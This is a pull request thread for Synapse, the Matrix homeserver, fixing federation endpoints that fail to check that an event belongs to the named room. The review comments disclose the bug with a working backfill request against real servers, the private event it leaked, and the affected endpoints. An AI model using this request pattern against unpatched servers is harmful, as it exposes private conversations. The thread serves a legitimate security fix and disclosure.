### PR TITLE
Validation for events/rooms in fed requests

### PR DESCRIPTION
**Pull request by richvdh**
When we get a federation request which refers to an event id, make sure
that said event is in the room the caller claims it is in.

### CODE REVIEW

**Comment by richvdh** [comment]
@matrixbot retest this please

**Comment by richvdh** [comment]
@matrixbot retest this please

**Comment by richvdh** [comment]
[the tests are being Difficult because sytest includes a bunch of tests for things like lazy-loading and a new /register API which were not present in 0.33.0

**Comment by richvdh** [comment]
Background on the vulnerability here, as reported by @turt2live:

TLDR: Requesting to backfill in a room your server is in for an event in a different room exposes the details of said event, which you can then backfill with (by using the same trick).

Three servers were used in this test: A, B, and C

A conversation between A and B should not be visible to C. However, if B and C share a different room together, C can request details of A and B's conversation if it can get an event ID.

Here's a real request:
```
./federation_client.py -c homeserver.yaml -d t2l.io -X GET 'backfill/!QtykxKocfZaZOUrTwp:matrix.org/?limit=5&v=$1531000688223PPNQb:dev.t2bot.io'
```

The event belongs to `!EPFdWEjXFViaANiqBq:dev.t2bot.io`, a private DM with me and my alt account. The room requested however is new Matrix HQ. Synapse happily replies with the event (included at the bottom of this issue for reference).

How does one get an event ID? Same way as https://github.com/matrix-org/internal-config/issues/358: permalinks, accidental sharing, malicious grepping, etc.

```
{
  "origin": "t2l.io",
  "origin_server_ts": 1533142676257,
  "pdus": [
    {
      "origin": "dev.t2bot.io",
      "depth": 17,
      "signatures": {
        "dev.t2bot.io": {
          "ed25519:a_NNsG": "McRfxdOyFLq2V1gSKuxGCGX1\/XVijpIZ\/sjJiSYFsuIrBJOqCjW8wj5EZp1iVu8g7xpCV\/Z2n7R7GIEB9ZQ7DA"
        }
      },
      "origin_server_ts": 1531000688677,
      "sender": "@travis:dev.t2bot.io",
      "event_id": "$1531000688223PPNQb:dev.t2bot.io",
      "prev_events": [
        [
          "$1531000171174mmRDc:dev.t2bot.io",
          {
            "sha256": "XpONimpDsHLBTi07JFIkxrz1MOpENjJdveH5JclP6oo"
          }
        ]
      ],
      "unsigned": {
        "prev_content": {
          "membership": "join",
          "avatar_url": "mxc:\/\/dev.t2bot.io\/UxZCrhPJJlBbbIuwPTwTmIcH",
          "displayname": "[DEV] TravisR TESTING\u00a0\u0646"
        },
        "prev_sender": "@travis:dev.t2bot.io",
        "replaces_state": "$1531000171174mmRDc:dev.t2bot.io",
        "age": 2141987580
      },
      "state_key": "@travis:dev.t2bot.io",
      "content": {
        "membership": "join",
        "avatar_url": "mxc:\/\/dev.t2bot.io\/UxZCrhPJJlBbbIuwPTwTmIcH",
        "displayname": "[DEV] TravisR"
      },
      "membership": "join",
      "prev_state": [
        
      ],
      "room_id": "!EPFdWEjXFViaANiqBq:dev.t2bot.io",
      "auth_events": [
        [
          "$15253980961982gcHLF:dev.t2bot.io",
          {
            "sha256": "Cv+EEZWv3Xzg5fqZBbimUbCQ7tPmHAv3HETePPPyWYk"
          }
        ],
        [
          "$15253980961984XmeqR:dev.t2bot.io",
          {
            "sha256": "o9X0LARYCcf6hncewpcbSDrfXQTFyE\/TD8XJ6zaCpO4"
          }
        ],
        [
          "$1531000171174mmRDc:dev.t2bot.io",
          {
            "sha256": "XpONimpDsHLBTi07JFIkxrz1MOpENjJdveH5JclP6oo"
          }
        ],
        [
          "$15253980961985rbabV:dev.t2bot.io",
          {
            "sha256": "2cgh6SrTkoXDoXIf72Z5p\/o4ddjLAKshLchtt1ZLboM"
          }
        ]
      ],
      "hashes": {
        "sha256": "pMNjoiH\/OupPQpQpNvGmQjPvPfMLqIplNyNf\/i2VTZA"
      },
      "type": "m.room.member"
    }
  ]
}
```


Similar problems apply to:

`GET /federation/v1/state/{roomId}/?event_id={eventId}`
`GET /federation/v1/state_ids/{roomId}/?event_id={eventId}`
`POST /federation/v1/query_auth/{roomId}/{eventId}` with body `{"auth_chain": []}`

**Comment by richvdh** [comment]
Some background on this vulnerability:

A number of federation endpoints, which take both a room id and an event id, do not correctly validate that the two match. They apply authentication checks based on the room id, but return results based on the event id. It is therefore possible, given an event id, for servers to get details of events which they should not have access to.

The following endpoints are affected:

`GET /federation/v1/backfill/{roomId}/?v={eventId}`
`GET /federation/v1/state/{roomId}/?event_id={eventId}`
`GET /federation/v1/state_ids/{roomId}/?event_id={eventId}`
`POST /federation/v1/query_auth/{roomId}/{eventId}` with body `{"auth_chain": []}`
